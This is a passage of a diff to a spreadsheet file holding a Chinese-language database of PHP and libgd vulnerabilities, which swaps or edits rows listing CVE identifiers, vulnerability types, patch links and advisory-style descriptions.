-          <t>PHP gdimagerotateinterpolated拒绝服务漏洞(CVE-2016-1903)</t>
+          <t>PHP 远程代码执行漏洞(CVE-2015-6834)</t>
         </is>
       </c>
       <c r="B457" t="inlineStr">
@@ -55730,7 +55730,7 @@
       </c>
       <c r="D457" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Code Execution</t>
         </is>
       </c>
       <c r="E457" t="inlineStr">
@@ -55740,7 +55740,7 @@
       </c>
       <c r="F457" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/gd/libgd/gd_interpolation.c文件中的‘gdImageRotateInterpolated’函数存在安全漏洞，该漏洞源于‘imagerotate’函数没有充分过滤较大的‘bgd_color’参数。远程攻击者可利用该漏洞获取敏感信息，或造成拒绝服务（越边界读取和应用程序崩溃）。以下版本受到影响：PHP 5.5.31之前版本，5.6.17之前5.6.x版本，7.0.2之前7.x版本。</t>
+          <t>PHP中的5.4.45之前，5.5.29之前的5.5.x和5.6.13之前的5.6.x中的多个Free-After-Use漏洞允许远程攻击者通过与（1）Serializable接口相关的向量执行任意代码，（2 ）SplObjectStorage类，以及（3）SplDoublyLinkedList类，它们在反序列化期间会被错误处理。</t>
         </is>
       </c>
       <c r="G457" t="inlineStr">
@@ -55760,7 +55760,7 @@
       </c>
       <c r="J457" t="inlineStr">
         <is>
-          <t>CVE-2016-1903</t>
+          <t>CVE-2015-6834</t>
         </is>
       </c>
       <c r="K457" t="inlineStr">
@@ -56196,7 +56196,7 @@
     <row r="461">
       <c r="A461" t="inlineStr">
         <is>
-          <t>PHP gd.c信息泄露漏洞(CVE-2016-7127)</t>
+          <t>PHP 整数溢出漏洞(CVE-2016-4073)</t>
         </is>
       </c>
       <c r="B461" t="inlineStr">
@@ -56211,18 +56211,18 @@
       </c>
       <c r="D461" t="inlineStr">
         <is>
-          <t>Information Disclosure</t>
+          <t>Integer Overflow</t>
         </is>
       </c>
       <c r="E461" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
-http://www.php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://git.php.net/?p=php-src.git;a=commit;h=64f42c73efc58e88671ad76b6b6bc8e2b62713e1</t>
         </is>
       </c>
       <c r="F461" t="inlineStr">
         <is>
-          <t>PHP 5.6.25之前的ext/gd/gd.c和7.0.10之前的7.x中的imagegammacorrect函数无法正确验证gamma值，这使远程攻击者可以拒绝服务（越界写入）或通过为第二个和第三个论点提供不同的符号来产生未指定的其他影响。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/mbstring/libmbfl/mbfl/mbfilter.c文件中的‘the mbfl_strcut’函数存在整数溢出漏洞。远程攻击者可借助特制的mb_strcut调用利用该漏洞造成拒绝服务（应用程序崩溃）或执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
         </is>
       </c>
       <c r="G461" t="inlineStr">
@@ -56242,7 +56242,7 @@
       </c>
       <c r="J461" t="inlineStr">
         <is>
-          <t>CVE-2016-7127</t>
+          <t>CVE-2016-4073</t>
         </is>
       </c>
       <c r="K461" t="inlineStr">
@@ -56317,7 +56317,7 @@
     <row r="462">
       <c r="A462" t="inlineStr">
         <is>
-          <t>PHP 整数溢出漏洞(CVE-2016-4073)</t>
+          <t>PHP gd.c信息泄露漏洞(CVE-2016-7127)</t>
         </is>
       </c>
       <c r="B462" t="inlineStr">
@@ -56332,18 +56332,18 @@
       </c>
       <c r="D462" t="inlineStr">
         <is>
-          <t>Integer Overflow</t>
+          <t>Information Disclosure</t>
         </is>
       </c>
       <c r="E462" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://git.php.net/?p=php-src.git;a=commit;h=64f42c73efc58e88671ad76b6b6bc8e2b62713e1</t>
+          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
+http://www.php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F462" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/mbstring/libmbfl/mbfl/mbfilter.c文件中的‘the mbfl_strcut’函数存在整数溢出漏洞。远程攻击者可借助特制的mb_strcut调用利用该漏洞造成拒绝服务（应用程序崩溃）或执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
+          <t>PHP 5.6.25之前的ext/gd/gd.c和7.0.10之前的7.x中的imagegammacorrect函数无法正确验证gamma值，这使远程攻击者可以拒绝服务（越界写入）或通过为第二个和第三个论点提供不同的符号来产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G462" t="inlineStr">
@@ -56363,7 +56363,7 @@
       </c>
       <c r="J462" t="inlineStr">
         <is>
-          <t>CVE-2016-4073</t>
+          <t>CVE-2016-7127</t>
         </is>
       </c>
       <c r="K462" t="inlineStr">
@@ -57884,7 +57884,7 @@
     <row r="475">
       <c r="A475" t="inlineStr">
         <is>
-          <t>PHP 整数溢出漏洞(CVE-2016-3078)</t>
+          <t>GD Graphics Library 整数符号错误漏洞(CVE-2016-3074)</t>
         </is>
       </c>
       <c r="B475" t="inlineStr">
@@ -57899,17 +57899,17 @@
       </c>
       <c r="D475" t="inlineStr">
         <is>
-          <t>Integer Overflow</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E475" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://php.net/ChangeLg-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://libgd.org/</t>
         </is>
       </c>
       <c r="F475" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP 7.0.6之前版本中的zip扩展中的php_zip.c文件存在整数溢出漏洞。远程攻击者通过调用ZipArchive类中的‘getFromIndex’或‘getFromName’参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出和应用程序崩溃）。</t>
+          <t>GD图形库2.1.1中的整数签名错误（又名libgd或libgd2）允许远程攻击者导致拒绝服务（崩溃）或可能通过精心制作的压缩gd2数据执行任意代码，从而触发基于堆的缓冲区溢出。</t>
         </is>
       </c>
       <c r="G475" t="inlineStr">
@@ -57929,7 +57929,7 @@
       </c>
       <c r="J475" t="inlineStr">
         <is>
-          <t>CVE-2016-3078</t>
+          <t>CVE-2016-3074</t>
         </is>
       </c>
       <c r="K475" t="inlineStr">
@@ -58004,7 +58004,7 @@
     <row r="476">
       <c r="A476" t="inlineStr">
         <is>
-          <t>GD Graphics Library 整数符号错误漏洞(CVE-2016-3074)</t>
+          <t>PHP 整数溢出漏洞(CVE-2016-3078)</t>
         </is>
       </c>
       <c r="B476" t="inlineStr">
@@ -58019,17 +58019,17 @@
       </c>
       <c r="D476" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>Integer Overflow</t>
         </is>
       </c>
       <c r="E476" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://libgd.org/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://php.net/ChangeLg-7.php</t>
         </is>
       </c>
       <c r="F476" t="inlineStr">
         <is>
-          <t>GD图形库2.1.1中的整数签名错误（又名libgd或libgd2）允许远程攻击者导致拒绝服务（崩溃）或可能通过精心制作的压缩gd2数据执行任意代码，从而触发基于堆的缓冲区溢出。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP 7.0.6之前版本中的zip扩展中的php_zip.c文件存在整数溢出漏洞。远程攻击者通过调用ZipArchive类中的‘getFromIndex’或‘getFromName’参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出和应用程序崩溃）。</t>
         </is>
       </c>
       <c r="G476" t="inlineStr">
@@ -58049,7 +58049,7 @@
       </c>
       <c r="J476" t="inlineStr">
         <is>
-          <t>CVE-2016-3074</t>
+          <t>CVE-2016-3078</t>
         </is>
       </c>
       <c r="K476" t="inlineStr">
